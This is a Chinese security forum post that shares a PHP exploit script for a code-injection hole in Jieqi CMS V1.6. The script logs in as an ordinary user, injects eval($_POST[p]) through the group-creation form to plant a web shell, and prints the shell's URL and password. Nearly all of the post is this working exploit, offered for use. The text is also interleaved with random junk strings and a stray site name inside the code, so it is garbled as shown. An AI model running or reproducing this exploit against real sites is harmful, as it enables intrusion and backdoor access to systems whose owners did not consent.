找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
! t4 e. u: a" T/ a. X; R
+ n4 J" K$ G* y
. q' g* _" a7 ]" }该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
3 j/ e  i* V6 i% J8 C 需要有一个能创建圈子的用户。* a7 T, m3 P* ~9 Y; A

1 y+ \$ t) y) r: f9 n  p0 ]<?php
, l: y+ [/ ~( i9 a" k 5 S3 i. m$ |; D& V( R) ]( C
print_r('
/ k3 ^8 L0 }. ]+---------------------------------------------------------------------------+
8 T0 T- B' n6 K0 g2 C! M* M" _Jieqi CMS V1.6 PHP Code Injection Exploit! o6 }8 w# T6 @" ?( H  A
by flyh4t
/ ?. Y2 M. z$ p2 F* z, ~mail: phpsec at hotmail dot com2 h9 B; c; _, J
team: http://www.wolvez.org
9 r9 s6 |: N) l+ H* q+---------------------------------------------------------------------------+  X$ @# y% C6 C* [9 x- q
'); /**
; Z" H% ~4 r* R9 _0 N * works regardless of php.ini settings* P7 s& o) L2 \* q9 X3 [
*/ if ($argc < 5) { print_r('
& @5 B% i$ V$ c# X8 ^# s. ]+---------------------------------------------------------------------------+  G3 ?8 `: g+ v8 O3 G5 k
Usage: php '.$argv[0].' host path username
8 Y# J: o: `* I4 j5 [7 O" whost:      target server (ip/hostname)( r$ Z3 J+ I+ o2 o' l% O: v
path:      path to jieqicms ' c$ Q: ~# h+ b# V: i4 H( t/ r
uasename:  a username who can create group9 G- K! M0 I+ Y& i
Example:( f. X# g' h; ]) f7 H5 i  i
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password+ y8 Y6 j) y6 y
+---------------------------------------------------------------------------+
* x$ d4 @* @4 H0 h+ m+ K* |'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
7 H) ]( _  |* W# d9 NContent-Disposition: form-data; name="gname"
: F6 f- Y3 H+ t' X" K ' E- T& X% j0 b9 J- D7 k1 q
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
" r. U$ K4 J6 ]-----------------------------23281168279961' V& C; Q0 }0 S" m  a
Content-Disposition: form-data; name="gcatid"4 t1 O7 F3 s( p6 P
2 |* }$ k! f- O% I" x
1- z  Z3 B% @2 `! y" [
-----------------------------23281168279961
% Y- K; m' f* W8 NContent-Disposition: form-data; name="gaudit"
7 U1 V9 p2 z( F5 h/ Q ; l  M# e; W9 C& Q5 r) g# i
1  n$ \0 l  V3 X9 N
-----------------------------232811682799615 D: ?% v$ Q& ?# k/ B
Content-Disposition: form-data; name="gbrief"
! @0 Q- l" S3 u+ a0 I) i ; M% L+ L6 S  y
1
! D: X3 H& {" o$ i; Z-----------------------------23281168279961--
: Q& u* }. a* a$ U  `: ]2 \/ B& q'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com- b, D" }) P9 _% n5 ?! `
" s# o- l$ |, d
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表